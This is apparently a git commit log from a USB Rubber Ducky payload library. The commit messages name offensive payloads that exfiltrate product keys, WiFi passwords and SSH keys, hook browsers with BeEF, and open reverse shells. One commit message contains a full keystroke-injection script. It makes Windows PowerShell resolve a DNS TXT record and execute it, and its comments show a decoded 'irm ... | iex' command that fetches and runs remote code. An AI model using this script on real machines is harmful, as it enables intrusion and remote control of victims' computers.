Julien M
e4a7876a00
Update version badge
2024-08-22 22:17:24 +02:00
Julien M
f7d2f37def
Remove duplicate function
2024-08-22 22:16:56 +02:00
Peaks
d02b817225
Merge pull request #400 from aleff-github/patch-80
...
Exfiltrate Windows Product Key
2024-08-21 18:42:57 -04:00
Alessandro Greco
828c60acca
Adapted with DUCKY_DRIVE_LABEL
2024-08-21 07:41:47 +02:00
Peaks
404640f615
Merge pull request #427 from aleff-github/patch-83
...
Extension: SAVE FILES IN RUBBER DUCKY STORAGE
2024-08-20 17:04:28 -04:00
Alessandro Greco
9e6b405745
from - to _
2024-08-20 12:33:10 +02:00
Alessandro Greco
c895160753
from - to _
2024-08-20 12:27:36 +02:00
Nate
afe674fcda
Create README.md
2024-08-06 19:30:25 -05:00
Nate
a9afcc0c6d
Create Kill-Explorer.txt
...
initial commit with ducky script
2024-08-06 19:29:22 -05:00
Peaks
e1531cc317
Merge pull request #468 from nathansb2022/master
...
Create payload DNS-TXT-CommandInjection.txt
2024-08-06 17:19:17 -04:00
Thomas Boeglin
f0cb608d09
Add Windows-Screenshot-Exfil payload
2024-08-06 09:58:39 +02:00
Nate
f2896f0b6f
Update DNS-TXT-CommandInjection.txt
...
Added PASSIVE_WINDOWS_DETECT EXTENSION per requested changes in pull request.
2024-08-05 14:21:46 -05:00
Nate
8eba7c5e9b
Delete payloads/library/execution/Kill-Explorer directory
2024-08-04 20:13:49 -05:00
Nate
5928326db7
Update README.md
2024-08-04 20:08:11 -05:00
Nate
42d2d6e9d5
Create Kill-Explorer.txt
2024-08-04 20:07:36 -05:00
Nate
97ae3a7339
Create README.md
2024-08-04 20:06:35 -05:00
Nate
e1c39bd455
Create DNS-TXT-CommandInjection.txt
...
Made changes requested from pull request. 1. Please remove this file as it is not needed. - removed .gitignore
2. I would recommend using a REM_BLOCK - added REM_BLOCK
3. I would include all of this in your readme.md it should contain all of this information. Having it in the payload clutters up the actual payload content. - Removed the clutter
4. If your target machine is Windows you can use the PASSIVE_WINDOWS_DETECT extension. This extension will dynamically determine start delay and also ensure that the payload is run on the correct OS. - added EXTENSION PASSIVE_WINDOWS_DETECT and updated the extension to new version. Ended up with the payload not executing. So, removed extension, added in delay.
5. I would recommend using STRINGLN - added STRINGLN
6. also make sure to have a # before your DEFINE calls. #MY_TARGET_URL - added the # to MY_TARGET_URL
7. Why is this ps1 included? - removed ConvertBase64.ps1
8. Why is this file included? this is just a .txt of the powershellReverseShellOne-liner.ps1 file you uploaded. - removed T1.txt
2024-08-04 18:08:21 -05:00
Nate
f43a37e607
Create powershellReverseShellOne-liner.ps1
...
updated comments
2024-08-04 18:04:18 -05:00
Nate
5ff699caa2
Update README.md
...
fixed formatting
2024-08-04 18:01:43 -05:00
Nate
ae0d976dce
Update README.md
...
fixed formatting
2024-08-04 18:01:10 -05:00
Nate
7658b87ce0
Update README.md
...
fixed readme formatting
2024-08-04 18:00:29 -05:00
Nate
abd0a09360
Create README.md
...
Updated to reflect requested changes from pull request.
2024-08-04 17:58:09 -05:00
Nate
c8e0ac280b
Delete payloads/library/execution/DNS-TXT-CommandInjection directory
...
deleting and removing files from requested changes in Pull request
2024-08-04 14:29:33 -05:00
Nate
1fd0843049
Delete payloads/library/execution/DNS-TXT-CommandInection directory
...
misspelled injection, deleting the directory, all content has been moved to DNS-TXT-CommandInjection directory
2024-08-04 10:46:16 -05:00
Nate
7c989706cc
Update DNS-TXT-CommandInjection.txt
...
updated folder, misspelled injection and update link to ConvertBase64.ps1
2024-08-04 10:41:20 -05:00
Nate
c1608976d9
Update README.md
...
updated folder, misspelled injection and updated link to ConvertBase64.ps1
2024-08-04 10:38:54 -05:00
Nate
072a5dbc8a
Create ConvertBase64.ps1
...
updated folder, misspelled injection
2024-08-04 10:37:16 -05:00
Nate
cea9eb46ef
Create powershellReverseShellOne-liner.ps1
...
updated folder, misspelled commandInjection
2024-08-04 10:35:42 -05:00
Nate
e985ed3a61
Create T1.txt
...
updated folder, misspelled injection
2024-08-04 10:34:32 -05:00
Nate
3b8a1d9ec5
Create README.md
...
updating to new folder, misspelled injection
2024-08-04 10:33:19 -05:00
Nate
c832c1868c
Create DNS-TXT-CommandInjection.txt
...
misspelled Injection in file name
2024-08-04 10:31:39 -05:00
Nate
867b15eb6d
Create .gitignore
...
misspelled folder
2024-08-04 10:29:45 -05:00
Nate
054f81e077
Update DNS-TXT-CommandInection.txt
...
misspelled injection
2024-08-04 10:24:30 -05:00
Nate
e4cbee78f1
Update README.md
...
misspelled injection
2024-08-04 10:23:43 -05:00
Nate
2782d874c9
Update README.md
2024-08-03 23:50:18 -05:00
Nate
ada8bf9ea7
Update DNS-TXT-CommandInection.txt
2024-08-03 23:47:09 -05:00
Nate
13355e8519
Update README.md
2024-08-03 23:43:50 -05:00
Nate
fc745db314
Update README.md
2024-08-03 23:40:57 -05:00
Nate
b4978b7b47
Update DNS-TXT-CommandInection.txt
2024-08-03 23:37:33 -05:00
Nate
1db132c3ac
Update README.md
2024-08-03 23:36:21 -05:00
Nate
902412339b
Update DNS-TXT-CommandInection.txt
2024-08-03 23:35:02 -05:00
Nate
7a36e6324a
Update powershellReverseShellOne-liner.ps1
2024-08-03 23:33:41 -05:00
Nate
dad3d550fe
Create DNS-TXT-CommandInection.txt
...
REM Title: DNS-TXT-CommandInection
REM Author: Nate
REM Description: A usb rubber ducky payload that leverages DNS TXT records to perform command injection.
REM Windows Powershell is the CLI used by the payload. Replace the DNS TXT record for your domain with
REM the base64 encoded payload you have. See README.md for more details on converting your payload to base64
REM and an example of creating your DNS TXT record in AWS Route53 service.
REM Target: Windows 10, 11
REM Props: Hak5, Darren Kitchen, Korben
REM Version: 1.0
REM Category: Execution
REM CONFIGURATION
REM REQUIRED A domain with the ability to manipulate the DNS TXT records.
REM REQUIRED Web Server hosting the payload. In this example, python3 http.server was used to host a
REM reverseshell.
REM REQUIRED - Provide URL used for Example
DEFINE #MY_TARGET_URL example.com
REM Example: powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
REM Example of Decoded payload: "irm http://MY_TARGET_URL/T1.txt | iex"
REM NOTES: No base64 can be used as an alternative by replacing "$a=",";powershell -e $a" with just "|iex"
REM for the STRING payload below. Examples of the decoded command and encoded command are shown below to put
REM into DNS TXT record.
REM Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"
REM Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="
REM ShoutOut: powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok. See link below.
REM https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
REM The link below has the Powershell script to convert your payloads to Base64.
REM https://
DELAY 1000
GUI r
DELAY 1000
STRING powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
DELAY 500
ENTER
2024-08-03 23:32:09 -05:00
Nate
571e2e6e33
Create T1.txt
2024-08-03 23:30:46 -05:00
Nate
3578034173
Create powershellReverseShellOne-liner.ps1
2024-08-03 23:30:02 -05:00
Nate
b31e55d14a
Create convertBase64.ps1
2024-08-03 23:29:01 -05:00
Nate
784e37b063
Create README.md
2024-08-03 23:27:09 -05:00
Nate
460c95f5df
Update .gitignore
2024-08-03 21:19:44 -05:00
Nate
b1999a0e7e
Create .gitignore
...
.gitignore as a placeholder
2024-08-03 21:17:34 -05:00
Nicolo’
c5fe32cf05
Update payload.txt
2024-07-24 22:12:43 +02:00
Nicolo’
8754d6eab4
Update sy_cred.ps1
2024-07-24 21:23:43 +02:00
Nicolo’
791133a14e
Update README.md
2024-07-24 21:23:04 +02:00
Nicolo’
dc4ccd1874
Update README.md
2024-07-24 21:22:14 +02:00
Nicolo’
7972203c71
Update README.md
2024-07-24 21:18:14 +02:00
Nicolo’
10b6ea2f0e
Update sy_cred.ps1
2024-07-24 21:15:49 +02:00
Nicolo’
3dc6750316
Update payload.txt
2024-07-24 21:14:16 +02:00
Nicolo’
fcc1caf610
Update sy_cred.ps1
2024-07-24 19:58:46 +02:00
Nicolo’
d68bf2967f
Update payload.txt
2024-07-24 19:52:11 +02:00
Nicolo’
c231b242cb
Create sy_cred.ps1
2024-07-24 19:51:53 +02:00
Nicolo’
ab486b9b9f
Create payload.txt
2024-07-24 19:50:19 +02:00
Nicolo’
4f1ae9c312
Create README.md
2024-07-24 19:47:41 +02:00
Peaks
30de5c0260
Merge pull request #465 from F1ll0ry/master
...
WiFi-Passwords-Exfiltration-Via-SCP
2024-07-23 03:14:22 -04:00
zb0r
6bce38ad77
Renamed directory from WiFi-Passwords-Exfiltration to WiFi-Passwords-Exfiltration-Via-SCP
2024-07-22 09:01:08 +00:00
Peaks
e17abcfa02
Merge pull request #464 from PlumpyTurkey/master
...
Updates extensions and payloads
2024-07-21 21:16:19 -04:00
zb0r
023c46c15a
Fixed a typo in the extension
2024-07-19 01:40:38 +03:00
zb0r
152f89c78d
fixed the extension
2024-07-19 01:34:58 +03:00
Peaks
c79209168a
Update payload.txt
...
Fixing my mistake of wrong extension.
2024-07-18 16:56:45 -04:00
Peaks
6a33d49db1
Update payload.txt
...
Fixing Extension call. content was missing.
2024-07-18 16:54:34 -04:00
zb0r
cd3d4e7e42
Create README.md
2024-07-18 12:05:14 +03:00
zb0r
25b879d4ff
Create Payload.txt
2024-07-18 12:04:12 +03:00
Robert Naame
17b28cd2ee
Moved WiFi-Passwords-Exfiltration files to exfiltration directory
2024-07-18 11:51:12 +03:00
zb0r
50812cddfa
Updated a typo
2024-07-18 11:35:55 +03:00
zb0r
114209b817
Create README.md
2024-07-18 10:59:30 +03:00
zb0r
c174b59c50
Create payload.txt
2024-07-18 10:56:11 +03:00
PlumpyTurkey
da3191f6f2
Updates version badge
2024-07-12 16:51:33 +02:00
PlumpyTurkey
3e5ca780e6
Updates extensions
2024-07-12 16:46:13 +02:00
PlumpyTurkey
52f6bdbc6f
Uses a function instead of executing directly
2024-07-12 16:41:39 +02:00
Peaks
b469affe05
Merge pull request #410 from Mr-Proxy-source/master
...
1 New Mobile IOS payload | 2 New Exfiltration payloads
2024-07-11 10:51:10 -04:00
Mr. Proxy
c59a06365e
Added line number.
2024-07-10 01:41:10 +02:00
Mr. Proxy
69b17636d2
Remove link.
2024-07-10 01:40:38 +02:00
Mr. Proxy
d67cbf2004
Added instructions to readme.
2024-07-10 01:40:10 +02:00
Mr. Proxy
a8411c91f7
Fix link.
2024-07-10 01:35:51 +02:00
Peaks
4fb883c8ee
Merge pull request #354 from aleff-github/patch-68
...
Defend Yourself From CVE-2023-23397
2024-07-09 09:45:15 -04:00
Peaks
b19ede4efe
Merge pull request #461 from F1ll0ry/master
...
The-Perfect-Stealthy-Payload
2024-07-09 09:32:00 -04:00
zb0r
fd925f1fe3
Rename folder from 'Cache Folder Exclusion & Payload Download + Persistence' to 'The-Perfect-Stealthy-Payload'
2024-07-09 06:30:20 +00:00
zb0r
6a5a148642
Revert "Rename payloads/library/general/Cache Folder Exclusion & Payload Download + Persistence/README.md to payloads/library/general/The-Perfect-Stealthy-Payload"
...
This reverts commit 972d70d78e.
2024-07-09 06:26:21 +00:00
zb0r
972d70d78e
Rename payloads/library/general/Cache Folder Exclusion & Payload Download + Persistence/README.md to payloads/library/general/The-Perfect-Stealthy-Payload
2024-07-09 09:18:47 +03:00
Alessandro Greco
25a18f4e96
[+] PASSIVE_WINDOWS_DETECT
2024-07-09 07:35:40 +02:00
Mr. Proxy
db42b39dc0
Removing made changes.
2024-07-03 18:59:09 +02:00
zb0r
50faacbf53
Update payload.txt
2024-07-03 10:58:31 +03:00
zb0r
1309e9b825
Update payload.txt
2024-07-03 10:57:30 +03:00
zb0r
f1c213b48c
Update README.md
2024-07-03 10:56:17 +03:00
Mr. Proxy
ffea938417
Fixed defining for google exfil
2024-07-02 12:12:43 +02:00
Mr. Proxy
c4aaea55be
Fix for defining
2024-07-02 12:11:11 +02:00
zb0r
18e495712b
added PASSIVE_WINDOWS_DETECT
2024-07-01 14:21:10 +03:00
Dallas Winger
6afdd39d95
add onemillioncheckboxes.com checker payload
2024-06-26 17:02:10 -04:00
Peaks
1bdf62bc7e
Merge pull request #431 from PlumpyTurkey/master
...
New Payloads and Extensions
2024-06-26 16:45:10 -04:00
zb0r
07a4f98dc9
Update payload.txt
2024-06-25 15:50:21 +03:00
zb0r
9cb9099976
Create README.md
...
initial commit
2024-06-25 13:26:57 +03:00
zb0r
95c823b642
initial commit
...
Created the Payload
2024-06-25 13:16:31 +03:00
LulzAnarchyAnon
68997ce959
Update payload.txt
2024-06-11 19:57:36 -07:00
Peaks
cd63cd6b2e
Fixing REM typo
2024-06-10 11:57:26 -04:00
LulzAnarchyAnon
bf5044f3c7
Update payload.txt
2024-06-10 08:47:04 -07:00
Peaks
cd3704042c
Merge pull request #411 from Kr1ss-XD/patch-DuckyLogger
...
Patch ducky logger
2024-06-09 15:27:26 -04:00
Peaks
b59f95f00d
Merge pull request #453 from aleff-github/patch-86
...
Prank In The Middle - Thunderbird
2024-06-06 22:02:49 -04:00
Aleff
255713357b
[+] STRINGLN_POWERSHELL
2024-06-06 10:03:22 +02:00
Peaks
a787588a04
Merge pull request #442 from thomasgruebl/new-sshkey-exfiltration-feature
...
adding new ExfiltrateSSHKeys payload
2024-06-05 15:29:07 -04:00
Peaks
4650098cea
Merge pull request #441 from wino-willy/wino-willy-BeEF_Injection
...
Wino willy BeEF Injection
2024-06-05 15:24:02 -04:00
Peaks
d9b3ac4ed3
Merge pull request #443 from aleff-github/patch-84
...
This Damn Shell Doesn't Work, SO SAD! :C
2024-06-05 15:00:51 -04:00
Peaks
8ba844143c
Merge pull request #444 from aleff-github/patch-85
...
Dump Windows Memory Through ProcDump
2024-06-05 14:16:21 -04:00
Julien M
510c6dadf6
Add missing quotes
2024-06-04 12:28:22 +02:00
Aleff
fe2a080aae
Update payload.txt
2024-06-04 07:39:16 +02:00
Aleff
9ac4d543b1
Image removed to lighten repository
2024-06-03 09:02:52 +02:00
Aleff
f2e1f66bc6
Prank In The Middle - Thunderbird
...
The name of the payload `Prank In The Middle` is named after the pun Prank + Man In The Middle in that this operation, in some ways, can remotely be configured as a MITM attack but since it was created specifically for playful purposes then here is the reason for the union with the word Prank.
I don't know if anyone else has uploaded the same thing in the past, so apologies if it already exists.
2024-06-03 08:53:17 +02:00
Julien M
3da90fee4d
Small updates
2024-06-02 13:25:50 +02:00
Julien M
ea737c4c6d
Various small updates
2024-06-02 13:23:36 +02:00
Julien M
f8a4371552
Update "PowerShell To Dropbox" Extension
2024-06-02 13:21:39 +02:00
Julien M
ba07d3810e
Merge branch 'hak5:master' into master
2024-06-02 10:21:10 +00:00
Aleff
3627585903
Redefined from "#ONE_ONLY_IF..." to "#TARGET_KALI_LINUX"
2024-06-01 10:50:35 +02:00
Aleff
f143daa518
Redefined DEFINEtions from $ to #
2024-06-01 10:47:20 +02:00
Aleff
2e892e4b0e
Aporting hak5peaks tips
...
[#] Extension renamed to `_` instead of `-` and only all caps
[#] Windows to all caps
[+] Added #DRIVER-LABEL
[#] Unordered spacing removed
2024-06-01 10:26:10 +02:00
0i41E
40f7f072ea
Changed Username
2024-05-28 19:25:26 +02:00
Aleff
821255659e
Tip from hak5peaks
2024-05-23 18:05:34 +02:00
Aleff
942bd88b8b
Tip from hak5peaks
2024-05-23 18:01:01 +02:00
Peaks
45ab8a2a48
Merge pull request #437 from jbjb6000/patch-1
...
Update payload.txt
2024-05-21 21:35:16 -04:00
Thomas Gruebl
f134a9bd65
making requested changes
2024-05-18 10:16:58 +02:00
aleff-github
7aed09beb7
README
2024-03-26 10:15:14 +01:00
Aleff
dbe778bb92
Dump Windows Memory Through ProcDump
...
This payload allows you to dump the RAM memory used by a running application by using the free software ProcDump.
2024-03-26 10:11:55 +01:00
Aleff
05b31b2756
DELAY
2024-03-20 10:37:51 +01:00
Aleff
f6736094e9
ALT F4
2024-03-20 10:33:42 +01:00
Aleff
0cf15c4743
readme
2024-03-20 10:09:40 +01:00
Aleff
ea4efd07b8
This damn shell doesn't work, SO SAD! :C
...
This payload can be used to prank your friends so that when they open their terminal it will close immediately.
I don't know if anyone else has uploaded the same thing in the past, so apologies if it already exists.
2024-03-20 10:05:27 +01:00
Thomas Gruebl
c1e4956391
adding new ExfiltrateSSHKeys payload
2024-03-16 11:50:56 +01:00
wino-willy
e3842d8a78
Update payload.txt
...
Missed a few grammatical errors
2024-03-15 05:25:57 -07:00
wino-willy
c6a048252d
BeEF_Injection
...
Hello,
Long time listener, first time caller. I came up with this payload when I was trying to figure out a quick way to hook a browser using the BeEF framework. The premise is pretty simple, it opens a bunch of Chrome tabs and the idea being that one of them is the attacker's hosted IP/domain. I chose to write in DS 1.0 so it is as backwards compatible as possible. Anyways I read the submission guidelines carefully so let me know if I'm off in any way.
Any and all help is much appreciated.
Sincerely,
\/\/1/\/0
\/\/1|_|_Y
2024-03-15 05:09:01 -07:00
Matthew Kayne
8bc5dd096c
Update payload.txt
...
Fixed spelling and grammar errors in the comments
2024-03-06 20:34:11 +00:00
jbjb6000
b3c95f7b7d
Update payload.txt
...
Updated the zip file to point to the new version path.
2024-02-08 18:01:26 -05:00
Julien M
a8e430148d
Update 1 payload
...
- Update "Windows Privilege Excalibur" payload
2024-01-20 19:05:20 +01:00
Julien M
05014bee3f
Add 1 extension and 2 payloads
...
- Add "Run Hosted PowerShell" extension
- Add "Windows Duck In The Middle" payload
- Add "Windows Product Key Grabber" payload
2024-01-20 19:02:46 +01:00
Julien M
761a5fa08c
Remove 1 extension and 1 payload
...
- Remove "PowerShell To Dropbox" extension
- Remove "Windows Product Duckey" payload
2024-01-20 18:54:57 +01:00
Aleff
35fc314e15
Update payload.txt
2024-01-14 12:56:38 +01:00
Aleff
203bf15391
Update README.md
2024-01-14 12:56:23 +01:00
Aleff
76b023efa3
Update README.md
2024-01-14 12:55:18 +01:00
Aleff
dc5c20e7ac
Update README.md
2024-01-14 11:51:58 +01:00
Aleff
bf9ec4cfc0
Merge remote-tracking branch 'upstream/master' into patch-66
2024-01-14 11:43:28 +01:00
Aleff
8d3adb90ad
space removed
2024-01-14 11:27:35 +01:00
Dallas Winger
bf2dfb7c17
Merge pull request #347 from aleff-github/patch-64
...
Install And Run Any Arbitrary Executable - No Internet And Root Needed
2024-01-08 02:24:00 -05:00
Dallas Winger
6cf55d1bd6
Merge pull request #346 from aleff-github/patch-63
...
Send Messages In Discord Channel-Server
2024-01-08 02:23:09 -05:00
Dallas Winger
2fea45c738
Merge pull request #342 from aleff-github/patch-61
...
Try To Catch Me
2024-01-08 02:22:09 -05:00
Dallas Winger
d75f9f96cc
Merge pull request #341 from aleff-github/patch-60
...
Create And Exfiltrate A Webhook Of Discord
2024-01-08 02:21:56 -05:00